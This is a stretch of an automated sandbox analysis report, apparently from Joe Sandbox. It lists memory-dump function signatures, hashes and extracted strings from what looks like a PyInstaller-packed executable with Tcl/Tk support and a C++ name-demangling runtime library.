                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF710303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551594165.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: AddressProc
                                                                                                                                                                                                  • String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                                                                                                                                  • API String ID: 190572456-3427451314
                                                                                                                                                                                                  • Opcode ID: ea7dfca1e90abb6d4d8c6eb1b798acaf406610e772db9aaa2d8df727af0780f5
                                                                                                                                                                                                  • Instruction ID: 5e504b644c3a40f64b5c8a86189c43ec28e7b9216a8c96b11471d89b6c973905
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ea7dfca1e90abb6d4d8c6eb1b798acaf406610e772db9aaa2d8df727af0780f5
                                                                                                                                                                                                  • Instruction Fuzzy Hash: CEE1A76499DF4391EA16FB08E9141B5ABA5BF49770FC4503AC81E263A4EF3CB54CC231
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1552353019.00007FFEEE1C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFEEE1C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552320581.00007FFEEE1C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552452581.00007FFEEE275000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552509174.00007FFEEE2AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552536826.00007FFEEE2B2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ffeee1c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Name::operator+Name::operator+=$Decorator::getName$Name::Name::operator=$Name::doPchar$DimensionSigned$DataDecoratedEncodingStringSymbolType
                                                                                                                                                                                                  • String ID: `anonymous namespace'$`string'$operator
                                                                                                                                                                                                  • API String ID: 2020783597-815891235
                                                                                                                                                                                                  • Opcode ID: 3c21f6e1fc1565ac1cfb2fd5206cc140514e7d7df8721337382753e13a86550f
                                                                                                                                                                                                  • Instruction ID: 9fe73ebb4f78d2aa8553831f315519bff26d360c21f4da765193fdc9dcefb29c
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3c21f6e1fc1565ac1cfb2fd5206cc140514e7d7df8721337382753e13a86550f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 73228262E18A5685EB24DF60F8943FC2772BB88748F574036CA8D176EDDEA8E545C302
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1552353019.00007FFEEE1C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFEEE1C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552320581.00007FFEEE1C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552452581.00007FFEEE275000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552509174.00007FFEEE2AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552536826.00007FFEEE2B2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ffeee1c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Name::operator=$Name::operator+Name::operator+=$Decorator::getNameName::Type$DataName::doPchar
                                                                                                                                                                                                  • String ID: volatile$<unknown>$UNKNOWN$__int128$__int16$__int32$__int64$__int8$__w64 $bool$char$char16_t$char32_t$const$double$float$int$long$long $short$signed $unsigned $void$volatile$wchar_t
                                                                                                                                                                                                  • API String ID: 1480303775-3737837666
                                                                                                                                                                                                  • Opcode ID: 1927567a377c84a443f6970d25b003a49c416ab76026ca8221145af2a49d523a
                                                                                                                                                                                                  • Instruction ID: 4a451b4fdd7d2e0c19ffcf3fb607e6df7fe592d93f8fe0426b2846932fd0832c
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1927567a377c84a443f6970d25b003a49c416ab76026ca8221145af2a49d523a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: C8D12A62E18A1294FB64CF54F8803BC23A1AB9C744F938532D98E566FDDFBCE5448342
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1552353019.00007FFEEE1C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFEEE1C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552320581.00007FFEEE1C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552452581.00007FFEEE275000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552509174.00007FFEEE2AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552536826.00007FFEEE2B2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ffeee1c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Decorator::get$Name::operator+=$DimensionSigned$Name$Name::operator+$DecoratedName::$DataName::doName::getPcharStringType
                                                                                                                                                                                                  • String ID: NULL$`generic-class-parameter-$`generic-method-parameter-$`template-type-parameter-
                                                                                                                                                                                                  • API String ID: 283215372-4167119577
                                                                                                                                                                                                  • Opcode ID: 12bb7d13e92f06a6bf447f779c0ee1e92f81f505711a6c6b54402271d41620aa
                                                                                                                                                                                                  • Instruction ID: 4825383b2e156cbbc5d8192f0f69559c57658bbd302e47af62eb186d434ae87c
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 12bb7d13e92f06a6bf447f779c0ee1e92f81f505711a6c6b54402271d41620aa
                                                                                                                                                                                                  • Instruction Fuzzy Hash: DCB15F22F0C60295FB15AF64E4443FC2761ABD9748F974036CA8D16AFEDEACE509C342
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1552353019.00007FFEEE1C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFEEE1C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552320581.00007FFEEE1C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552452581.00007FFEEE275000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552509174.00007FFEEE2AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552536826.00007FFEEE2B2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ffeee1c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Name::operator+$Decorator::get$DataIndirectNameName::Name::doName::operator+=PcharScopeType
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3173522582-0
                                                                                                                                                                                                  • Opcode ID: 5d5f78a55cbb505edb1646c940a8ce2b9e8aeb4b195174f4d175174c9cb5d7f9
                                                                                                                                                                                                  • Instruction ID: 6a5f4726f6b0979120f6f2b925f3c57257518907aa65f1fee5df89105c54c59b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5d5f78a55cbb505edb1646c940a8ce2b9e8aeb4b195174f4d175174c9cb5d7f9
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 92F18D76E08A8299E721DF74E4802FC37B5FB88748B464032DA8D57BADDEB8D509C341
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1552353019.00007FFEEE1C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFEEE1C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552320581.00007FFEEE1C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552452581.00007FFEEE275000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552509174.00007FFEEE2AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552536826.00007FFEEE2B2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ffeee1c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Decorator::getNameReplicator::operator+=Template
                                                                                                                                                                                                  • String ID: generic-type-$template-parameter-
                                                                                                                                                                                                  • API String ID: 2731555906-13229604
                                                                                                                                                                                                  • Opcode ID: 396f79b88366afe23f1aff7c6d7c11bf4edeca51deac59b79e7b12377a9b3622
                                                                                                                                                                                                  • Instruction ID: 88c4482d7097a7425fc8c65e4993f09c815ac1e2fe34908e3b96ee500559ef38
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 396f79b88366afe23f1aff7c6d7c11bf4edeca51deac59b79e7b12377a9b3622
                                                                                                                                                                                                  • Instruction Fuzzy Hash: CA918322A18A8698EB158F65F4503BD37A5AB88784F470432D98D577F9DFFCE505C302
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1551419790.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551387449.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551462787.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF710303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551594165.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Message
                                                                                                                                                                                                  • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                                                                                                                                                                  • API String ID: 2030045667-1550345328
                                                                                                                                                                                                  • Opcode ID: 654bb04dfa0f1f3c403e0c296a97dc3596cd50463da0eae47ab6076654925a3b
                                                                                                                                                                                                  • Instruction ID: 8475aaa157a9a7f543b3be7bb71394dce2c0d197e34b86e77540a7cc02f339be
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 654bb04dfa0f1f3c403e0c296a97dc3596cd50463da0eae47ab6076654925a3b
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0351AE61B18E4392EA11BB11AA515BAEB60BF467B4FD44131EE0D07B96EF3CF54C8720
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 00007FF7102C86B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7102C3FA4,00000000,00007FF7102C1925), ref: 00007FF7102C86E9
                                                                                                                                                                                                  • ExpandEnvironmentStringsW.KERNEL32(?,00007FF7102C7C97,?,?,FFFFFFFF,00007FF7102C3834), ref: 00007FF7102C782C
                                                                                                                                                                                                    • Part of subcall function 00007FF7102C26C0: MessageBoxW.USER32 ref: 00007FF7102C2736
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1551419790.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551387449.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551462787.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF710303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551594165.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                                                                                                                                                  • String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
                                                                                                                                                                                                  • API String ID: 1662231829-930877121
                                                                                                                                                                                                  • Opcode ID: c3532161b1b2b7c53ec0a0b3f79f5e94743c67efbab5da7731ebfcd00691680a
                                                                                                                                                                                                  • Instruction ID: 4fc551f03afe220fa508810956e2b5b4509088c4f11bfb10f8e9aaa6f5827366
                                                                                                                                                                                                  • Opcode Fuzzy Hash: c3532161b1b2b7c53ec0a0b3f79f5e94743c67efbab5da7731ebfcd00691680a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: C041B421A3CE4381FA51BB24EA552BAEA61BF947A0FC45031D64E52795EE3CF50C8730
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1551419790.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551387449.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551462787.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF710303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551594165.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                                                                                                                  • String ID: P%
                                                                                                                                                                                                  • API String ID: 2147705588-2959514604
                                                                                                                                                                                                  • Opcode ID: 028f263e58f42d33d872b22938efc015f71aa7b4c996476cfe5add7d8b08dd36
                                                                                                                                                                                                  • Instruction ID: 2515e3242082aed70463a4dedcb934d744a6b3f25cd045521c73e843645ee31c
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 028f263e58f42d33d872b22938efc015f71aa7b4c996476cfe5add7d8b08dd36
                                                                                                                                                                                                  • Instruction Fuzzy Hash: C9510726614BA186D6259F26F4181BBFBA1F798B61F404121EBCE43785DF3CE049DB20
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1551419790.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551387449.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551462787.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF710303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551594165.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                  • String ID: -$:$f$p$p
                                                                                                                                                                                                  • API String ID: 3215553584-2013873522
                                                                                                                                                                                                  • Opcode ID: 6485ef080591767760fe67f9caec812fff4e1ba5c20858478bd9f0fbec74de2f
                                                                                                                                                                                                  • Instruction ID: 2198a09fbf9af3507d176845c8e0ce322dd15ef702c6e42c5b0ab0ff9c6f0dd2
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6485ef080591767760fe67f9caec812fff4e1ba5c20858478bd9f0fbec74de2f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: AB12A223A0CAA386FB20BA15D0542B9FA51FB40774FD44136E699467C4DFBCFD888B64
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1551419790.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551387449.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551462787.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF710303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551594165.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                  • String ID: f$f$p$p$f
                                                                                                                                                                                                  • API String ID: 3215553584-1325933183
                                                                                                                                                                                                  • Opcode ID: 47a7a6303f50c331757a7ed503f6ccc132970c05c2223996d06c8e5714df85c4
                                                                                                                                                                                                  • Instruction ID: c7108147193213be7047729e535db6d711e21f6fce37f56f216e38a4a6e993c5
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 47a7a6303f50c331757a7ed503f6ccc132970c05c2223996d06c8e5714df85c4
                                                                                                                                                                                                  • Instruction Fuzzy Hash: BC129263E0C94386FB20BA15E0947B9EA51FB807A4FD44031F689467E4DB7DFC889B64
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1551419790.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551387449.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551462787.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF710303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551594165.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Message
                                                                                                                                                                                                  • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                  • API String ID: 2030045667-3659356012
                                                                                                                                                                                                  • Opcode ID: 042f7d8fb1578682235fd100909504afde6b69eb2aa08c650c9c2e0e8eef848c
                                                                                                                                                                                                  • Instruction ID: 0c014dd05e9e100d9cc49e8df0cdf85d50e91f5337c1f7f898066be17bcf59a7
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 042f7d8fb1578682235fd100909504afde6b69eb2aa08c650c9c2e0e8eef848c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5441B221B18E4342FA14BB12AA416B6EB91BF46BE4FD84031DE0D07B95DE7CF44D8760
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1551419790.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551387449.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551462787.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF710303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551594165.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Process_invalid_parameter_noinfo$ByteCharCodeCommandConsoleCreateCtrlExitHandlerInfoLineMultiObjectSingleStartupWaitWide
                                                                                                                                                                                                  • String ID: CreateProcessW$Failed to create child process!
                                                                                                                                                                                                  • API String ID: 2895956056-699529898
                                                                                                                                                                                                  • Opcode ID: 2d8580ce5d81a01d0f8683f73fef31206a84e7faf833a053d17f215ed92b6c27
                                                                                                                                                                                                  • Instruction ID: 68137be278342e9e0bad040a3162552071a6033893bc3ec9c774368a11d067aa
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2d8580ce5d81a01d0f8683f73fef31206a84e7faf833a053d17f215ed92b6c27
                                                                                                                                                                                                  • Instruction Fuzzy Hash: DA412032A18B8281EA21AB24F4552AAF7A1FB85370F904335E6AD477D5DF7CE4488B10
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1552353019.00007FFEEE1C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFEEE1C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552320581.00007FFEEE1C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552452581.00007FFEEE275000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552509174.00007FFEEE2AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552536826.00007FFEEE2B2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ffeee1c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: NameName::Name::operator+Name::operator+=$Decorator::getDimensionName::doPcharSigned
                                                                                                                                                                                                  • String ID: `template-parameter$void
                                                                                                                                                                                                  • API String ID: 1951524168-4057429177
                                                                                                                                                                                                  • Opcode ID: 6ae3ef52113e57d35b7955a0f65f779d93265ba774f9a60eaa75a8868ae336a0
                                                                                                                                                                                                  • Instruction ID: c3c0ed711987e343ff93b1536082376585cf27ddaf8c2732892e3ffd58a6676b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6ae3ef52113e57d35b7955a0f65f779d93265ba774f9a60eaa75a8868ae336a0
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8F313B22F18A4684FB15DF65F8503BD23A1BB88B84F874432CA8D177A9DFACE404C342
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 00007FFEEE1DF2D0: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,00007FFEEE1DF0A6), ref: 00007FFEEE1DF2F0
                                                                                                                                                                                                    • Part of subcall function 00007FFEEE1DF2D0: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,00007FFEEE1DF0A6), ref: 00007FFEEE1DF346
                                                                                                                                                                                                    • Part of subcall function 00007FFEEE1DF2D0: LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,00007FFEEE1DF0A6), ref: 00007FFEEE1DF3EB
                                                                                                                                                                                                  • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FFEEE1DF105
                                                                                                                                                                                                  • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FFEEE1DF123
                                                                                                                                                                                                  • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FFEEE1DF2B4
                                                                                                                                                                                                  • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FFEEE216450
                                                                                                                                                                                                  • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00007FFEEE216483
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1552353019.00007FFEEE1C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFEEE1C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552320581.00007FFEEE1C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552452581.00007FFEEE275000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552509174.00007FFEEE2AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552536826.00007FFEEE2B2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ffeee1c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CriticalSection$EnterErrorFileLast$CloseCreateHandleLeaveType
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3788438030-0
